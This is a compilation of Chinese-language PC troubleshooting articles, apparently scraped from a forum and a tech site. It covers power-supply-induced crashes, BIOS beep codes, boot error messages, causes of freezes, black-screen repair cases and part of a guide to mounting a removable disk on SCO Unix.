    为了进一步证实这一判断是否准确，开机进入BIOS的系统监控项，分别查看机箱平放和竖放时CPU的温度变化情况。当机箱竖放时，开机后CPU的温度迅速上升；平放时，开机后CPU的温度上升缓慢，在40℃左右波动，由此找到故障原因。于是赶紧拆下CPU风扇，用镊子将风扇的固定铁片缩短，使它与CPU紧紧接触，重新启动，故障排除

玩3D游戏居然会导致死机？

故障现象：好友的电脑已经不能满足最新的3D游戏及系统软件等要求，决定进行升级。升级的配件为：KT333主板、AMD Athlon XP 1700+、HY 256MBDDR333内存、CF4 MX440 64MB显卡等，其余的如硬盘、声卡及机箱电源等一律继续“服役”，安装了Win98SE，并把主板的4INI补丁等装好，运行了极品飞车6来测试整机的性能，效果果然有了质的飞跃，可好景不长，玩了十多分钟游戏后，屏幕出现一条条横纹，接着就死机了。

    故障分析：根据笔者的经验，电脑出现花屏的时候，除了显卡本身的质量问题外，最可能出现的故障就是显卡驱动有兼容性问题。于是本着先软后硬的原则，笔者重新安装了经过微软WHQL认证的驱动，再运行游戏，仍然花屏，再装上新版的VIA AGP补丁，还是没用，笔者又进入主板BIOS，把显卡的一些选项如AGP4X改成AGP2x，再进人游戏依然花屏!这块GF4 MX440显卡做工还可以，怎么会出现花屏呢?笔者又尝试运行一些2D游戏，没有想到却十分正常，上网玩了半个小时网络游戏，又看了会儿VCD，都没有出现死机的问题，但只要一运行3D游戏，系统立即死机！

    笔者仔细分析，电脑能玩2D游戏、上网、看VCD，可以看出运行对系统负荷小的软件不会造成死机，而一旦运行对系统负荷大的3D游戏便会死机，会不会是CPU不稳定？于是马上打开机箱，风扇使用的是正品九洲风神，摸摸散热片，温度并不高。看来真是显卡质量有问题，只好明天去退货了。

    就在笔者准备把部件装回机箱的时候，忽然发现朋友的机器还一直用着原来K6-2配的杂牌电源，好家伙，轻飘飘的，居然还敢标称300W，不是假货才怪。这显然无法喂饱这块Athlon XP 1700+，看来玩3D游戏会死机和这块劣质杂牌电源一定有关系。

    故障解决：第二天到电脑城买了一个长城的250W电源，装上机器测试3D游戏，这一次再没有出现死机的问题。再进入主板BIOS对CPU进行超频，居然可以在不加电压的情况下把这块Athlon XPl700+稳稳超到2200+，在加压0.1V的情况下，可以稳稳地超到2400+，并通过了2个多小时不间断的大型3D游戏及3DMark 2001SE测试！至此，这次升级才算大功告成！

    故障总结：在升级的时候笔者就麻痹大意了，没有注意到一个用在K6-2上面的杂牌电源怎么可以供得起如Atldon XP及CeForce4显卡等耗电大户，才走了这么多冤枉路。所以笔者在这里提醒各位朋友，升级，别忘了配个大电源哟

下面是一些主机开机时的一些故障的分类、现象及解决方法：

一、开机无显示（分为显示器完全没有显示和发出报警声）
显示器完全没有显示：
1、电源有没有工作
要判断电源是否有在工作可检查三个地方：
一、电源背面的散热风扇是否不转。说明：若是电源坏了，它的散热风扇一定不会转，
但也有可能刚好是风扇本身坏了，故还应检查其他地方，以判断是否电源坏掉。
二、计算机主机面板上的POWER指示灯是否不亮。说明：计算机主机上的LED指示灯，指
示电源、硬盘、软盘遥工作情况，若是这些LED指示灯不亮，很可能就是电源没有供
电。
三、启动时是否听不到软驱、硬盘或光驱在工作的声音。说明：启动时计算机会对这些
硬件装置做检查，若是听不到这些声音，表示电源根本没有供给它们。
若是确定电源没有工作，那怎么解决呢，且听我细细道来：
若是确定电源没有工作，先不要以为电源坏掉，可检查以下几个地方：
一、总开关是否跳电了，插头是否松动，若是有使用延长线，应查看延长线的保险丝是
否烧断了。
二、电源是否因为电路短路而停止供电：由于电源本身设计有侦测短路的功能，因此它
会在侦测到输出的电路有短路的情况下，自行切断所有的供电，故造成电源不工作。这
种情况可由散热风扇的运行看出来，如果电源是好的，而且主机内部某处发生了短路的
现象，则在开启电源时，就会发现风扇转一下就停住，并且发出滋滋的声音，若是关掉
开关后一会儿，风扇又自己转了几圈，这种症状就是典型的短路现象。要找出造成短路
的组件，可将所有由电源出来的直流电输出接头拔除，如果所有的接头都被拔掉之后，
短路的现象消失了，那就代表某个组件的线路是短路的，可将接头逐一插回去，直到短
路现象再发生时，就可以确认该组件是坏掉的，更换该组件就可以了。要注意在拔接头
及插接头之前电源需先关掉，以免烧掉计算机的零件。
三、电源的直流输出是否正常：若是以上三点所提到的情况都查过了，电源仍然不工
作，此时可用三用电表来量测电源的直流输出，若是完全没有输出，表示电源本身坏
掉，更换一个电源，应该就可以解决问题。
2、电源供电正常但是仍然无声无影
一、显示器本身的问题
    若是电源供电正常，且启动时主机面板上的各种LED指示灯都亮，尤其是硬盘的指
示灯都一闪一闪的在工作，表示计算机有正常启动，但是显示器完全没有显示，也没有
听到喇叭的报警声，此时请检查显示器的电源开关是否有开，这点可查看显示器上的电
源指示灯有否亮着，若是不亮，可能是显示器的电源线没有接好，或显示器电源开关根
本没有开。若是指示灯有亮，请检查显示器亮度与对比是否没有调好，有些显示器的亮
度若被调到最低，则会全黑，此时显示器当然没有完全显示。如果问题仍然存在，可借
一台好的显示器，来确定是否臫的显示器坏掉。
二、CPU的问题
    若是电源供应没有问题且显示器本身也是好的，但是仍然无声无影，则可能是CPU
有问题，这包括CPU没插好（SOCKET　7的CPU第一只脚方向不正确或CPU没有完全插下
去），超频超得太凶了，频率调得太高，让CPU根本就跑不动，CPU核心电压调整超出范
围，若是将以上问题处理完了，还是一样无法启动，由可能是CPU本身坏掉，换一颗CPU
试试。
三、其他
若前面三项检查完了，仍找不出问题。很可能是硬盘的连接线接反了。注意有红芯的一
边应该最靠近电源接口。也可能是显卡、内存和主板接触不良，也会导致开机无显示。
其他
启动时发出报警声：
计算机能发出报警声，表示BIOS已开始工作，BIOS所作的第一件事就是启动自我测试，
如果在启动过程中，有任何一个环节出现错误，bios会自动发出报警声，同时停留在那
里等候处置，如果是在显示器显卡驱动之后才有错误，就会将错误信息显示在显示器
上。我们可以参考各家BIOS公司的报警声信息来知道故障点的位置。下面列出二大BIOS
厂商的信息：
AMI
一短声：内存
两短声：parity check
三短声：内存前64K
四短声：系统定时器
五短声：cpu
六短声：键盘控制线路
七短声：cpu虚拟86模式发生例外，中断错误
八短声：显卡没插好或显卡上的内存有问题
九短声：checksum error
一长声三短声：主存储器或扩充内存
一长声八短声：视讯扫描测试有问题
Award BIOS

1短 系统正常启动
2短 常规错误，请进入CMOS SETUO重新设置不正确的选项
1长1短 RAM或主板出错
1长2短 显示错误（显示器或显卡）
1长3短 键盘控制器错误
1长9短 主板Flash RAM
不停的长响 内存没插稳或已损坏
不停的响 电源或显示器或显卡没连接好
不停的短响 电源故障
无声音无提示 电源故障

Phoenix BIOS

1短 系统正常启动
3短 系统加电自检初始化失败
1短1短2短 主板错误
1短1短3短 主板电池没电或CMOS损坏
1短1短4短 ROM BIOS校验出错
1短2短1短 系统实时时钟出错
1短2短2短 DMA通道初始化失败
1短2短3短 DMA通道页寄存器出错
1短3短1短 内存通道刷新错误
1短3短2短 基本内存出错（内存损坏或RAS设置错误）
1短3短3短 基本内存出错（DIMM插槽上的内存损坏）
1短4短1短 基本内存某一地址出错
1短4短2短 系统基本内存有奇偶校验错误
1短4短3短 EISA总线时序器错误
1短4短4短 EISA NMI口错误
2短1短1短 系统基本内存检查失败
3短1短1短 第一个DMA控制器或寄存器出错
3短1短2短 第二个DMA控制器或寄存器出错
3短1短3短 主中断处理寄存器错误
3短1短4短 副中断处理寄存器错误
3短2短4短 键盘时钟器有问题
3短3短4短 显卡RAM出错
3短4短2短 显示器数据线松动，显卡未插稳或已损坏
3短4短3短 未发现显卡的ROM BIOS
4短2短1短 系统实时时钟错误
4短2短2短 系统启动错误，CMOS设置不当或BIOS损坏
4短2短3短 键盘控制器（8042）中的Gate
A20开关有错，BIOS不能切换到保护模式
4短2短4短 保护模式中断错误
4短3短1短 内存错误（内存损坏或RAS设置有误）
4短3短3短 系统第二时钟错误
4短3短4短 实时时钟错误
4短4短1短 串口错误
4短4短2短 并口错误
4短4短3短 数学协处理器出错

3、启动过程显示器显示错误信息
显示器显示错误信息的情况，是最容易处理的，因为在显示器能显示之前，计算机已经
历过基本的CPU激添阶段，内存测试阶段及显卡驱动阶段。在显卡驱动之后，BIOS所测
试到的硬件故障信息才能显示到显示器上，我们只要依照这些错误信息去处理，就可以
解决问题。这阶段的问题通常是由键盘、硬盘、软盘或电池所引起，常见的错误信息如
下：
一、CMOS Checksum failure ：CMOS中的BIOS检验和读出错，应重新设CMOS
二、CMOS battery failed 或CMOS battery low：表示电池没电，需更换电池
三、Keyboard error or no keyboard present：表示键盘故障或键盘没接好
四、Floppy disk(s) fail(40)：表示软驱未接好或软驱有故障
五、HDD/FDD controller failure：表示硬盘/软盘的接口或数据线有问题。
六、Memory Address/Verify Error at .......：表示内存有问题
七、PARITY CHECK ERROR：表示内存同位检查错误
八、DISK BOOT FAILURE,INSERT SYSTEM DISK AND PRESS ENTER：
表示启动磁盘故障，或是启动磁盘没有DOS启动系统。
九、cache Memory Bad,Dot Enable Cache：主板上的高速缓存损坏
十、DMA error：DMA控制器坏
4、无法加载操作系统
一、BIOS设置不正确：例如硬盘的类型设置错误，造成无法启动。
二、IO.SYS或MSDOS.SYS不太正常或不存在：这两个程序是操作系统的核心程序，若有
任何损坏，将造成无法启动。
三、CONFIG.SYS中所加载的驱动程序有问题或设置不正确：在DOS环境下，光驱及声卡
等设备都需要在CONFIG.SYS文件中设置加载驱动程序，若是这些驱动程序有问题或参数
设置不正确，则会产生错误信息。
四、COMMAND.COM不存在或不太正常：这个程序亦为操作系统的核心程序之一，若不存
在或损坏，将产生错误信息。
五、AUTOEXEC.BAT中所执行的程序有问题或设置不正确：这个程序是DOS环境的自动执
行批处理文件，若此文件所执行的程序有问题，同样会有错误信息产生。
下面是这阶段最常见的错误信息及其处理方法：
1、No Partition Bootable：硬盘未做分区，执行FDISK.EXE将硬盘分区即可
2、Missing Operation System:硬盘未做格式化，请用启动盘重新启动，再执行Format
c:/s即可
3、Non-System Disk or Disk Error：硬盘中找不到IO.SYS或MSDOS.SYS等程序，执行
SYS C:即可
4、Bad Or Missing Command Interpreter：硬盘根目录中找不到COMMAND.COM或是些文
件损坏了。将COMMAND.COM文件拷贝到硬盘根目录中即可

2006-6-24 10:41:24　编辑 删除　IP：已记录

1/1　1
收藏帖子 | 取消收藏 | 返回页首

Copyright 2006 bbs.SEIYAS.com
赛雅万维网络增值服务 网站备案号：[苏ICP备06024994号]
客服QQ1:93343386 QQ刻录群I:13390957 QQ刻录群Ⅱ:23886910 QQ刻录群Ⅲ:11239396
赛雅万维讨论群I:18349553 赛雅万维讨论群Ⅱ:21727883 赛雅万维讨论群Ⅲ:13574354 赛雅万维讨论群Ⅳ:22376286


全面深入了解电脑死机的原因

《一键清理系统垃圾》

全面深入了解电脑死机的原因

  死机是令操作者颇为烦恼的事情。死机时的表现多为“蓝屏”，无法启动系统，画面“定格”无反应，鼠标、键盘无法输入，软件运行非正常中断等。尽管造成死机的原因是多方面的，但是万变不离其宗，其原因永远也脱离不了硬件与软件两方面。

    由硬件原因引起的死机

    【散热不良】 显示器、电源和CPU在工作中发热量非常大，因此保持良好的通风状况非常重要，如果显示器过热将会导致色彩、图象失真甚至缩短显示器寿命。工作时间太长也会导致电源或显示器散热不畅而造成电脑死机。CPU的散热是关系到电脑运行的稳定性的重要问题，也是散热故障发生的“重灾区”。

    【移动不当】 在电脑移动过程中受到很大振动常常会使机器内部器件松动，从而导致接触不良，引起电脑死机，所以移动电脑时应当避免剧烈振动。

    【灰尘杀手】 机器内灰尘过多也会引起死机故障。如软驱磁头或光驱激光头沾染过多灰尘后，会导致读写错误，严重的会引起电脑死机。

    【设备不匹配】 如主板主频和CPU主频不匹配，老主板超频时将外频定得太高，可能就不能保证运行的稳定性，因而导致频繁死机。

    【软硬件不兼容】 三维软件和一些特殊软件，可能在有的微机上就不能正常启动甚至安装，其中可能就有软硬件兼容方面的问题。

    【内存条故障】 主要是内存条松动、虚焊或内存芯片本身质量所致。应根据具体情况排除内存条接触故障，如果是内存条质量存在问题，则需更换内存才能解决问题。
  【硬盘故障】 主要是硬盘老化或由于使用不当造成坏道、坏扇区。这样机器在运行时就很容易发生死机。可以用专用工具软件来进行排障处理，如损坏严重则只能更换硬盘了。另外对于在不支持UDMA 66/100的主板，应注意CMOS中硬盘运行方式的设定。

    【CPU超频】 超频提高了CPU的工作频率，同时，也可能使其性能变得不稳定。究其原因，CPU在内存中存取数据的速度本来就快于内存与硬盘交换数据的速度，超频使这种矛盾更加突出，加剧了在内存或虚拟内存中找不到所需数据的情况，这样就会出现“异常错误”。解决办法当然也比较简单，就是让CPU回到正常的频率上。

    【硬件资源冲突】 是由于声卡或显示卡的设置冲突，引起异常错误。此外，其它设备的中断、DMA或端口出现冲突的话，可能导致少数驱动程序产生异常，以致死机。解决的办法是以“安全模式”启动，在“控制面板”→“系统”→“设备管理”中进行适当调整。对于在驱动程序中产生异常错误的情况，可以修改注册表。选择“运行”，键入“REGEDIT”，进入注册表编辑器，通过选单下的“查找”功能，找到并删除与驱动程序前缀字符串相关的所有“主键”和“键值”，重新启动。

    【内存容量不够】 内存容量越大越好，应不小于硬盘容量的0.5～1%，如出现这方面的问题，就应该换上容量尽可能大的内存条。

    【劣质零部件】 少数不法商人在给顾客组装兼容机时，使用质量低劣的板卡、内存，有的甚至出售冒牌主板和Remark过的CPU、内存，这样的机器在运行时很不稳定，发生死机在所难免。因此，用户购机时应该警惕，并可以用一些较新的工具软件测试电脑，长时间连续考机（如72小时），以及争取尽量长的保修时间等。
  由软件原因引起的死机

    【病毒感染】 病毒可以使计算机工作效率急剧下降，造成频繁死机。这时，我们需用杀毒软件如KV300、金山毒霸、瑞星等来进行全面查毒、杀毒，并做到定时升级杀毒软件。

    【CMOS设置不当】 该故障现象很普遍，如硬盘参数设置、模式设置、内存参数设置不当从而导致计算机无法启动。如将无ECC功能的内存设置为具有ECC功能，这样就会因内存错误而造成死机。

    【系统文件的误删除】 由于Windows 9x启动需要有Command.com、Io.sys、Msdos.sys等文件，如果这些文件遭破坏或被误删除，即使在CMOS中各种硬件设置正确无误也无济于事。解决方法：使用同版本操作系统的启动盘启动计算机，然后键入“SYS C：”，重新传送系统文件即可。

    【初始化文件遭破坏】 由于Windows 9x启动需要读取System.ini、Win.ini和注册表文件，如果存在Config.sys、Autoexec.bat文件，这两个文件也会被读取。只要这些文件中存在错误信息都可能出现死机，特别是System.ini、Win.ini、User.dat、System.dat这四个文件尤为重要。

    【动态链接库文件（DLL）丢失】 在Windows操作系统中还有一类文件也相当重要，这就是扩展名为DLL的动态链接库文件，这些文件从性质上来讲是属于共享类文件，也就是说，一个DLL文件可能会有多个软件在运行时需要调用它。如果我们在删除一个应用软件的时候，该软件的反安装程序会记录它曾经安装过的文件并准备将其逐一删去，这时候就容易出现被删掉的动态链接库文件同时还会被其它软件用到的情形，如果丢失的链接库文件是比较重要的核心链接文件的话，那么系统就会死机，甚至崩溃。我们可用工具软件如“超级兔仔”对无用的DLL文件进行删除，这样会避免误删除。
    【硬盘剩余空间太少或碎片太多】 如果硬盘的剩余空间太少，由于一些应用程序运行需要大量的内存、这样就需要虚拟内存，而虚拟内存则是由硬盘提供的，因此硬盘要有足够的剩余空间以满足虚拟内存的需求。同时用户还要养成定期整理硬盘、清除硬盘中垃圾文件的良好习惯。

    【BIOS升级失败】 应备份BIOS以防不测，但如果你的系统需要对BIOS进行升级的话，那么在升级之前最好确定你所使用BIOS版本是否与你的PC相符合。如果BIOS升级不正确或者在升级的过程中出现意外断电，那么你的系统可能无法启动。所以在升级BIOS前千万要搞清楚BIOS的型号。如果你所使用的BIOS升级工具可以对当前BIOS进行备份，那么请把以前的BIOS在磁盘中拷贝一份。同时看系统是否支持BIOS恢复并且还要懂得如何恢复。

    【软件升级不当】 大多数人可能认为软件升级是不会有问题的，事实上，在升级过程中都会对其中共享的一些组件也进行升级，但是其它程序可能不支持升级后的组件从而导致各种问题。

    【滥用测试版软件】 最好少用软件的测试版，因为测试软件通常带有一些BUG或者在某方面不够稳定，使用后会出现数据丢失的程序错误、死机或者是系统无法启动。

    【非法卸载软件】 不要把软件安装所在的目录直接删掉，如果直接删掉的话，注册表以及Windows目录中会有很多垃圾存在，久而久之，系统也会变不稳定而引起死机。

    【使用盗版软件】 因为这些软件可能隐藏着病毒，一旦执行，会自动修改你的系统，使系统在运行中出现死机。

    【应用软件的缺陷】 这种情况是常见的，如在Win 98中运行那些在DOS或Windows 3．1中运行良好的16位应用软件。Win 98是32位的，尽管它号称兼容，但是有许多地方是无法与16位应用程序协调的。还有一些情况，如在Win 95下正常使用的外设驱动程序，当操作系统升级后，可能会出现问题，使系统死机或不能正常启动。遇到这种情况应该找到外设的新版驱动。

  【启动的程序太多】 这使系统资源消耗殆尽，使个别程序需要的数据在内存或虚拟内存中找不到，也会出现异常错误。

    【非法操作】 用非法格式或参数非法打开或释放有关程序，也会导致电脑死机。请注意要牢记正确格式和相关参数，不随意打开和释放不熟悉的程序。

    【非正常关闭计算机】 不要直接使用机箱中的电源按钮，否则会造成系统文件损坏或丢失，引起自动启动或者运行中死机。对于Windows 98/2000/NT等系统来说，这点非常重要，严重的话，会引起系统崩溃。

    【内存中冲突】 有时候运行各种软件都正常，但是却忽然间莫名其妙地死机，重新启动后运行这些应用程序又十分正常，这是一种假死机现象。出现的原因多是Win 98的内存资源冲突。大家知道，应用软件是在内存中运行的，而关闭应用软件后即可释放内存空间。但是有些应用软件由于设计的原因，即使在关闭后也无法彻底释放内存的，当下一软件需要使用这一块内存地址时，就会出现冲突。


随机性死机故障分析与排除

《一键清理系统垃圾》

随机性死机故障分析与排除

    随机性故障是计算机使用过程中经常遇到的一种常见故障，由于出现死机的故障不确定，所做操作性质不固定，而且死机发生时，显示的现象也不统一，所以故障发生的范围不易确定，给维修工作带来了一定的难度。
    根据大量的维修实例分析总结，随机性死机故障产生的原因主要是以下三个方面：
    一、环境因素
    环境因素对于机器的正常运行有着很大的影响。计算机对环境的要求主要包括：温度、湿度、电网干扰、电磁冲击、外界振动冲击、静电、接地系统、供电系统等方面内容。其中尤以温度、湿度、静电、接地系统、供电系统对机器的正常运行影响最大。由于机器工作环境，如灰尘、潮湿引起芯片间线路短路或插拔件接触不良，都有可能引起系统死机。根据实际维修统计，环境因素造成的随机性故障占故障总数的10％左右。
    二、软件原因
    软件系统引起的随机性死机包括两种情况。一是病毒破坏，虽然有时可以通过冷、热启动再次启动机器，但运行不久又会死机。二是应用软件与操作系统不完全兼容，它们之间有冲突或者与硬件固有特性发生冲突，这种死机大多没有键盘响应，只能通过冷启动再次启动机器。
    对于软件原因造成的随机性故障的检查方法是，可以使用干净的引导盘重新引导机器后，再运行杀毒软件清除病毒。对于应用软件与操作系统有冲突，建议采用修改程序配置与改变机器硬件配置相结合的方法解决。根据实际维修统计，软件原因造成的随机性故障占故障总数的20％左右。
    三、硬件原因
    硬件系统引起死机，主要是由于机器内部元件质量、兼容性或匹配不当引起的。通常包括：
    1.可插拔芯片接触性故障。主板上有一些可插拔芯片接触不良，这类故障极易发生在CPU芯片、内存芯片以及各种扩展槽上，另外，AGP扩展槽普遍存在插不紧的问题。
    2.芯片工作时序不匹配。在一个电路中如果几个芯片共同完成一个功能，而几个芯片之间的执行速度不匹配，当一个信号在芯片内部通过逻辑变换，传输所需的延时时间比较长，就容易产生时序故障。或时序电路的控制时间关系要求比较严格，偶尔发生时序信号漂移，这种情况最常见于组装的兼容机。此外，由于采用了不同厂家的板卡或芯片也存在不完全兼容的现象，时钟频率过高，也是造成死机的原因。
    3.热稳定性差。所谓的热稳定性差是指机器在开始时运行正常，运行一段时间后，随着芯片温度的上升，开始出现死机。关机后，冷却休息一段时间后开机又可以正常工作，之后又出现死机。其主要原因还是在于元器件本身质量不过关。
    4.芯片驱动能力差。因为每个芯片的扇出值是固定的，在电路设计中要求芯片的输出信号驱动的芯片数必须小于允许的扇出值。如果芯片的扇出值不满足其额定指标，当系统或某个电路连接较多设备时，就会造成芯片工作死机。这种故障经常出现在主板上的I/O接口、内存的地址或数据驱动芯片。
    5.抗干扰能力差。芯片的电源线和地线在印刷电路板上的布线宽度过小，线与线之间距离过近或芯片之间的电平匹配不好，使传输信号有“振荡”或“反射”造成信号干扰，使芯片具有抗干扰能力而引起系统死机。根据实际维修统计，硬件原因造成的随机性故障占故障总数的70％左右，是造成随机性故障的主要原因，也是本文重点介绍的部分。
    四、随机性故障分析与维修方法
    该类故障的检查原则是，首先根据故障现象，推断出故障的性质，然后根据这种推断，利用万用表、逻辑笔、示波器等工具，检查硬件线路上的相应信号是否有随机的干扰或时序漂移等现象，如果有则找到相应的硬件进行维修和更换。
    首先检查是否有接触性故障。在关机状态下取下各种扩展卡，用手指卡住板卡边缘轻轻弯折、敲打，然后在开机通电状态下，用手指按压板卡边缘、主板上的CPU插座、内存条以及各种插头或插座，如果在某个情况下机器可以启动，则说明发生了接触性不良故障。
    如果经反复试验证明不是接触性故障，就要检查是否控制电路的时序故障。重点检查：
    1.系统控制电路芯片。主要是地址总线和数据总线芯片，ALE的地址锁存信号，以及主板上的南、北桥芯片等其它门阵芯片。
    2.系统内存控制电路、驱动电路。主要是RAM的行选通信号RAS、列选通信号CAS、行列地址转换控制信号和内存数据读出驱动、内存芯片速度匹配关系。
    3.系统各种时钟信号电路，主要是SYSCLK、PROCCLK、PCLK、DMACLK。
    通过使用100MHz以上的高频示波器检查上述信号，希望发现某个信号在某一瞬间出现不正常状态，如时序漂移或毛刺等干扰信号，发现后找到相应的芯片进行更换。
    三是热稳定性差是随时性故障的另一种主要的表现形式，随着夏季的到来或超频使用CPU等，这类故障变得越来越频繁。检查时可以使用电吹风距离打开的机箱20厘米～30厘米处进行加热，当机箱内温度上升到60℃～70℃左右时，故障可能开始频繁出现。当机器置于18℃～25℃的空调房间内，如果故障发生率大大降低，则确定是热稳定性差故障。再使用示波器主板上的数据总线、地址总线、控制芯片的进行输出波形的检查，如果发现有明显的干扰信号，则找到对应的芯片进行更换。
    四是信号之间的相互干扰和芯片驱动能力差问题也是造成随机性故障的常见原因之一。在维修中发现，此类故障多产生在74FXX芯片与74LSXX、ALSXX芯片之间。

作者：左巍
来源：电脑报


一起少见的黑屏故障

《一键清理系统垃圾》

一起少见的黑屏故障

   近日朋友乔迁，他的电脑也跟着进了新居。可是电脑到了朋友宽敞的书房，无论怎么接线，它始终是“黑脸”一张。无奈之下朋友求救于我。电话里我指导朋友“黑屏嘛，重新插插显卡、内存不就搞定了！”朋友说他已经插了无数次了！我立即赶过去，看看这个问题到底有多“怪”。

       望闻问切

       我先让朋友将电脑最近的工作情况汇报一遍。朋友说电脑在旧居工作好好的，偶有黑屏，但是朋友用“铁砂掌”（拍一下机箱）每次都可以搞定。我初步断定此次故障是接触不良导致的。于是我将所有的外设及板卡（软驱、硬驱、光驱、声卡、显卡、内存、股票卡）重装安装了一次。加电一试：怪哉，仍然“黑脸”一张！

       我只好自我解嘲，“你这机子很久没洗澡了吧，一定是槽子里的灰尘作怪。”朋友立即找来酒精棉球和吸尘器，我第二次取下各板卡，仔细清洗了一遍主板。再一加电，还是黑屏！

       我用手感觉电源风扇，风力够强（长城电源），CPU上面水晶风扇亦转得很快，一切都证明电源没 问题。症结在哪儿呢？我第三次取下各板卡，仅仅安装了一个“基本点亮系统”（主板、显卡、内存、显示器）。

       再一次加电，乖乖，故障依旧！我用手感觉显卡、内存、主板上芯片组的温度，均无一烫手，也闻不到异味，证明无短路发生。朋友不断嘀咕：“显示器、显卡、内存、CPU没问题，那一定是主板烧了。”在这种情况下，只有更换主板来试试了。

       于是万般无奈之下，我第四次取下所有板卡，欲取出主板。可就在我去掉主板与电源连接排线时，我微微感觉到主板电源插座有点松动！我仔细观察主板焊接面的电源插座，发现一颗焊点已经松动了。“拿烙铁来，再黑屏，我赔你一块主板！”我立时恢复了自信。

       我用烙铁点了一遍那几颗电源插座焊点，重新装好主板，接通所有外设，理直气壮地按下面板上“Power”键，嘿嘿，蓝天白云又蹦出来了！

       教训

       通常，黑屏多由显卡和内存造成，由显示器、主板损坏造成的可能性不大，本例故障属主板电源故障造成，实际中较少碰到。但细思之，应该一开始就分析得出来的：

       ① CPU风扇电源没经过主板（即CPU风扇转，并不能证明电源主板供电正常）；

       ②加电没听到硬盘磁头寻道的“哒哒”响声；

       ③扬声器没有报警声（显卡、内存故障，扬声器应有报警声）。综合上述因素，主板供电故障的可能性是最大的。

       在此，敬告各位电脑爱好者，遇到电脑故障，千万不要被常规的解决办法约束，要“跳出三界外”，全方位思考。


用“替换法”“对照法”处理电脑黑屏两例

《一键清理系统垃圾》

返回总目录 上一页 目录页

用“替换法”“对照法”处理电脑黑屏两例

加入时间：2003年9月14日 显示次数：9035
打包邮递 推荐给朋友 投票评论

    “替换法”就是用无故障的部件替换可能有故障或无故障但不能正常工作的部件，从而找出或排除故障的一种方法。“对照法”就是将有故障的电脑或部件与无故障的电脑或部件对照，从而找出排除故障的方法。这两种方法是非常有用的，在电脑的许多故障排除中都会用到它。这是我在机房维护中的两大法宝，特举下面两个实例，希望能给你一点启示。
        故障一
        单位新买回一台14英寸显示器，说明书上称最高分辨率为1024×68，于是我将分辨率改为1024×768，重新启动机器，黑屏。
        故障原因：可以断定，这款显示器实际能达到的分辨率与说明书标称的分辨率不符，这台显示器损坏的可能性极小，最大的可能性是分辨率上不了1024×768而点不亮。
        解决办法：用“替换法”可以解决这个问题。找一台能上到1024×768分辨率的显示器，替换下新显示器，然后将分辨率改回新显示器可使用的范围内，再换回新显示器即可。
        故障二
        一无盘WIN95工作站，一日开机，黑屏，重启数次，故障依旧，初步判断是显示器坏或者是系统坏。
        解决办法：还是先用“替换法”找出故障位置，将备用显示器换上，重新启动机器，蓝天白云后，桌面上的字比原来大了数倍，可以判断是显示器的故障。故障虽然找到了，但还得改回字体：右击桌面，选取“属性”，糟糕！怎么只能显示属性对话框的四分之一左右，还好，对话框可以移动，可怎么也看不到要修改的部分。怎么办？看来只好用“对照法”进行对比操作，赶紧打开一台相同的无故障机器，在该机上面操作一步，再返回故障机操作一步，如此数步，然后重启，哈哈！故障排除。再换上原来的显示器，居然又能正常使用了。
        故障原因：这是一台学生公用机器，肯定是有学生将字体定义得过大，原来的显示器质量不好，致使原显示器不能正常显示而黑屏。
        以上故障，许多人也许永远不会遇上，但是，排除故障所用的方法，的确实用而且有效，也许很多人都会用上。

作者：何仁江
来源：电脑报

>>上篇:打印机电源变压器的修理
<<下篇:主板电源导致电脑重启动一例


死机故障

《一键清理系统垃圾》

返回总目录

死机故障

◎WIN9X蓝屏错误代码
◎Win2000蓝屏画面错误代码说明(1)
◎Win2000蓝屏画面错误代码说明(2)
◎Win2000蓝屏画面错误代码说明(3)
◎Win2000蓝屏画面错误代码说明(4)
◎Win2000蓝屏画面错误代码说明(5)
◎Win2000蓝屏画面错误代码说明(6)
◎Win2000蓝屏画面错误代码说明(7)
◎Windows2000蓝屏死机故障处理
◎Windows 98关机死机原因及其排除方法
◎Windows 2000死机的应急处理
◎Windows 2000中蓝屏死机之停止信息分析
◎Windows 死机的简单预防
◎Windows错误代码大全
◎Windows蓝屏代码
◎Windows蓝屏代码含意速查表
◎Windows蓝屏代码含意速查表
◎导致计算机系统“死机”的原因及其预防方法
◎电脑故障维修判断指导大全蓝屏解读
◎电脑死机的原因
◎电脑死机故障分析
◎电脑死机原因大全
◎防止电脑死机二十五招之Win2000篇
◎黑屏的几个原因
◎“蓝屏”的原因及处理方法
◎优化游戏选项
◎全面深入了解电脑死机的原因
◎全面深入了解电脑死机的原因
◎随机性死机故障分析与排除
◎一起少见的黑屏故障
◎用“替换法”“对照法”处理电脑黑屏两例

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


SCO UNIX 上 活 动 硬 盘 的 安 装

《一键清理系统垃圾》

返回总目录 目录页 下一页

SCO UNIX 上 活 动 硬 盘 的 安 装

---- 活 动 硬 盘 以 其 高 容 量 和 灵 活 性 深 受 用 户 的 青 睐， 但 相 对 于 其 他 操 作 系 统 而 言， 在Unix 系 统 上 安 装 活 动 硬 盘 是 一 项 技 术 性 较 强 的 工 作， 笔 者 根 据 在SCO Unix 上 安 装Iomega 活 动 硬 盘 的 经 验， 给 出 了 具 体 的 操 作 步 骤， 以 供 同 行 参 考。

一、 硬 件 的 设 置 和 安 装
---- 活 动 硬 盘 驱 动 器 与 主 机 的 连 接 可 通 过 并 行 口 或SCSI 接 口， 但 在Unix 上 则 必 需 通 过SCSI 接 口。 在 正 式 安 装 之 前， 需 要 为 活 动 硬 盘 安 排 一 个SCSI 标 志 号（SCSI ID）， 该 标 志 号 不 能 使 用 ０、 １ 或 ７。

---- 其 次， 需 设 置 活 动 硬 盘 驱 动 器 背 后 的 开 关， 如 果 该 设 备 是SCSI 链 上 的 第 一 个 或 最 后 一 个 设 备， 则 设 置 为On， 否 则 设 置 为Off。

---- 最 后， 将 活 动 硬 盘 驱 动 器 联 接 到SCSI 接 口 板 上， 在 引 导 系 统 之 前， 应 确 保 驱 动 器 中 有 活 动 硬 盘。

二、 为 系 统 添 加 活 动 硬 盘 设 备
---- 以 超 级 用 户 进 入 系 统， 用mkdev 命 令 将 活 动 硬 盘 设 备 加 入 系 统, 命 令 格 式 为：

---- #mkdev hd id host 0
---- id： 活 动 硬 盘 的SCSI 标 志 号

---- host： 若 活 动 硬 盘 是 第 一 个（ 惟 一）SCSI 设 备， 则 该 值 为 ０， 若 是 第 二 个SCSI 设 备， 则 为 １。

---- 接 着 通 过 下 列 命 令 重 新 链 接 内 核， 但 在 有 些 版 本 的Unix 中， 以 下 步 骤 可 能 会 由 安 装 程 序 自 动 执 行。

#cd /etc/conf/ef.d
#./link_unix
